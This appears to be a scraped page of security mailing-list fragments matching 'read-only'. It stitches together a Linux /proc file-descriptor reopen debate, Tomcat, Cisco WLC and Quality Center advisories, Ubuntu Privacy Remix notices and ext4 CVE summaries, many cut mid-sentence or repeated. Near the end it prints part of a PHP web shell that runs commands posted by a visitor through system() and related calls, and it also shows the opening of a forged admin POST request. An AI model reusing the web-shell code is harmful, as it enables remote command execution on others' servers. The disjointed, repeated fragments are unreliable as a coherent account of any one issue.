Next Page >>
read/only
And due to the fact that it's being presented in /proc as an fd, you
treat it
as an fd, therefor your expectations do not match.
Your assumptions is; because you accessed the world writable file via
a read-only fd, you also expect the file to appear as read-only in /
proc.
There is the mis-match.
The idea of /proc is to refer to files being opened by the process,
while RETAINING the original INODE attributes, regardless of the fact
Your assumption that the same file descriptor is being re-opened is
wrong!
The file descriptor retrieved via /proc is a new one. It is not the
same as the
initial read-only.
Do a strace on your test and you will see that the 'file descriptor'
in /proc
will be accessed as an ordinairy file. After checking the directory
permissions
fd as input to the nobody process.
So nobody is not opening /dir/file.txt (he can't because he hasn't
access to it via /dir) but root is...
Therefor the write to the fd is failing, because you're passing a
read-only file descriptor.
Try to replay your scenario in separate shells, without the use of
sudo and redirection.
Best regards,
>
> I can do the example with fd passing and 700 directory, but it would
> be lot of C code. Feel free to play, my example was not nearly the
> only way to demonstrate it, and no, it was not racy.
Here is an example that shows the behavior where a passed read-only fd
can become read-write by reopening it through /proc, when file
permissions allow it (but directory permissions do not):
$ sudo su
# mkdir -m 0700 /dir
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
> > processes you do not own. Only ones you do (at least in a mainline kernel)
> > which is fair enough. This means that you can't have user a open a file
> > owned by user b and then let user c have access to it via
> > /proc/$pid/fd.
>
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
4 echo moo >cow
and socket buffers are dependent on mbufs for their storage.
Data can be embedded directly in mbufs, or mbufs can instead reference
external buffers. The sendfile(2) system call uses external mbuf storage
to directly map the contents of a file into a chain of mbufs for
transmission purposes. The mbuf object supports a read-only flag that
must be honored to prevent modification or writes to buffer data in
cases like these.
II. Problem Description
several vulnerabilities
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 9.04, is a live,
read-only CD that seals off your private data from the outside world to
offer protection against spying measures such as the german
„Bundestrojaner“, with which the German government and federal police
tries to spy on its citizens.
UPR does this using encryption and isolation methods. This method of
booting off a read-only CD provides a isolated and unmodifiable system
UPR Security Notice UPRSN-08_02 December 22, 2008
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world. It
does this using encryption and isolation methods. This method of booting
off a read-only CD provides a isolated and unmodifiable system that is
exceedingly difficult to compromise by spyware.
The following security issues affect the "Ubuntu Privacy Remix" releases
prior 8.04_r2.
My buy.. :-( I persumed a re-use of the read-only FD, but that's not
the case.
I replayed it on a test-box and did some strace meanwhile and also
took a look
at the sourcecode of kernel/fs/proc.
It seems that the /proc filedescriptor is directly referring the file
inode
When creating this proc-entry the user guest did have access to the
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
On Tue 2009-10-27 21:19:19, Marco Verschuur wrote:
> My buy.. :-( I persumed a re-use of the read-only FD, but that's not
> the case.
>
> I replayed it on a test-box and did some strace meanwhile and also
> took a look
> at the sourcecode of kernel/fs/proc.
>
> It seems that the /proc filedescriptor is directly referring the
> file inode
several vulnerabilities
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world. It
does this using encryption and isolation methods. This method of booting
off a read-only CD provides a isolated and unmodifiable system that is
exceedingly difficult to compromise by spyware.
The following security issues affect the "Ubuntu Privacy Remix" releases
prior 8.04_r1.
several vulnerabilities
###########################################################
Ubuntu Privacy Remix (UPR), based on Ubuntu 8.04 (LTS), is a live,
read-only CD that seals off your private data from the outside world to
offer protection against spying measures such as the german
„Bundestrojaner“, with which the German government and federal police
tries to spy on its citizens.
UPR does this using encryption and isolation methods. This method of
booting off a read-only CD provides a isolated and unmodifiable system
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to
the work directory. This directory is used for a variety of temporary
files such as the intermediate files generated when compiling JSPs
to Servlets. The location of the work directory is specified by
a ServletContect attribute that is meant to be read-only to web
applications. However, due to a coding error, the read-only setting
was not applied. Therefore, a malicious web application may modify
the attribute before Tomcat applies the file permissions. This can be
used to grant read/write permissions to any area on the file system
which a malicious web application may then take advantage of. This
When a user connects to Quality Center, the cache folder is automatically updated with the latest VBScript workflow files. Those files are then read by the QC front-end only once for the whole session. They are then used by the application whenever the associated events are raised.
There are 2 main points that make this workflow highly vulnerable:
1. Those files are written in plain text;
2. Marking those files as read-only (through the file properties) will prevent Quality Center from overwriting them.
If a user modifies this file and then mark it as read-only, he can execute arbitrary code. As the OTA API allows access to the database, he can also modify the data stored in the database as follows:
* Quality Center 9.2 (Unconfirmed)
- Severity High: user has higher capability than defined by their profile
* Quality Center 9.0 Patch < 17
> Your assumption that the same file descriptor is being re-opened is
> wrong!
> The file descriptor retrieved via /proc is a new one. It is not the
> same as the
> initial read-only.
True, we were just being sloppy with the words. But it does not matter
one iota.
> As Martin Rex already explained yesterday, /proc is all virtual.
>
> The /proc/self/fd/X appears to be a symlink, but it is not; it
> operates on underlying objects directly. And IMNSHO it should honor
> restrictions opened filedescriptors have, like append-only or
> read-only.
/proc/self/fd/X is something virtual, not something real. It is
state as held by the kernel, it is not persisted anywhere.
The reason why it is visualized like a symlink is to provide clue
Privilege Escalation Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Three privilege escalation vulnerabilities exist in the Cisco WLCs
that could allow an authenticated attacker with read-only privileges
to modify the device configuration.
These vulnerabilities are documented in Cisco Bug IDs CSCtc91431,
CSCsz66726, and CSCtc93837; and have been assigned
CVE IDs CVE-2010-2842, CVE-2010-2843, and CVE-2010-3033.
> On 24.10.2009 1:56, Pavel Machek wrote:
> >a) this kind of hardlink does not exist when /proc is mounted (and on
> >non-Linux)
> >(and c) writing to file descriptor opened read-only is bad).
> Did you think of creating a hardlink to the file in an unrestricted
> location?
Pavel considered that in his original mail, where he checked there were
> http://www.w3.org/TR/REC-DOM-Level-1/level-one-html.html
> ------------------------------------------------------
> readonly attribute long length;
> ------------------------------------------------------
That was DOM Level 1 (1999). Even level 2 (2000) has this as read-write:
http://www.w3.org/TR/DOM-Level-2-HTML/html.html#ID-94282980
Also keep in mind that with relatively few exceptions, W3C simply
Therefore a user with even the lowest level of access (ie. without any role configured) is able to promote himself as administrator
and/or change others roles and account parameters at will.
Depending of the role or roles initially configured for this user, access to the user management page may not be visible
into the interface's layout however the underlying script itself is still reachable and can be invoked "by hand".
Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)".
He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx)
then he could send a forged POST request similar to the one below:
POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1
User-Agent: xxxxxx
Hi Michal,
Interesting,
http://www.w3.org/TR/REC-DOM-Level-1/level-one-html.html
------------------------------------------------------
readonly attribute long length;
------------------------------------------------------
MZ> Does not seem to be the case in HTML5 at least?
There must have been a change then between HTML4 and HTML5
> (which is a sensible implementation and what the kernel seems
> to be currently doing), or implement it as a dup() and transfer
> of the filedescriptor. (Tranfering open filedescriptors between
> processes can also be done by IPC). Implemetenting it via dup()
> would probably keep the original filedescriptor attributes
> (such as read-only) but would require an entirely seperate
> approach to access control (who is allowed to dup() that filedescriptor),
> and it would create problems: like you would not be able to look
> into files that were opened only for write through /proc, which
> would seriously impair the usefulness of the fd-listing in /proc.
+-------
IronPort C-Series, X-Series, and M-Series appliances utilize code
covered by this advisory, but are not susceptible to any security
risk. IronPort C-Series, X-Series, and M-Series incorporate the
libraries under the advisory to provide anonymous read-only access to
system health data. There is no risk of escalated authorization
privileges allowing a 3rd party to make any configuration changes to
the IronPort devices. IronPort S-Series and Encryption Appliances are
not affected by this advisory. This announcement has also been posted
on the IronPort Support Portal, available to IronPort customers:
> processes you do not own. Only ones you do (at least in a mainline kernel)
> which is fair enough. This means that you can't have user a open a file
> owned by user b and then let user c have access to it via
> /proc/$pid/fd.
No, but you can upgrade file from read-only to read-write using /proc.
Pavel
--
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td>');
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen');
$tb->headerform(array('content'=>'<FONT COLOR=#9C9C9C>cmd:</FONT>'.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' '.$tb->makeinput('command').' '.$tb->makeinput('Run','command','','submit')));
echo"<tr class='secondalt'><td align='center'><textarea name='textarea' cols='100' rows='25' readonly>";
if ($_POST['command'] ) {
if ($execfunc=="system") {
system($_POST['command']);
The ext4_decode_error function in fs/ext4/super.c in the ext4
filesystem in the Linux kernel before 2.6.32 allows user-assisted
remote attackers to cause a denial of service (NULL pointer
dereference), and possibly have unspecified other impact, via a
crafted read-only filesystem that lacks a journal. (CVE-2009-4308)
The eisa_eeprom_read function in the parisc isa-eeprom component
(drivers/parisc/eisa_eeprom.c) in the Linux kernel before 2.6.31-rc6
allows local users to access restricted memory via a negative ppos
argument, which bypasses a check that assumes that ppos is positive
> ... another solution -- allow fcntl() to remove read-only and
> append-only limitations, so that behaviour is at least explicit.
Do not lower security, just to emulate /proc sloppiness. (That would be
like fixing a root security bug by doing away with the root password.)
Is there anything (currently) relying on that security?
Paul Szabo psz@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
> into the web browser. [...]
> In order to optimize the interaction speed of the application, a cache
> folder is created on the client machine. [...] Indeed, those files are
> required on the client machine because the workflow is execute on the
> client, not on the server. [...]
> If a user modifies this file and then mark it as read-only, he can
> execute arbitrary code. As the OTA API allows access to the database, he
> can also modify the data stored in the database as follows:
You say you can execute arbitrary code on your computer (under your own
account)? What an amazing exploit! (pun intended)
Next Page>>
|
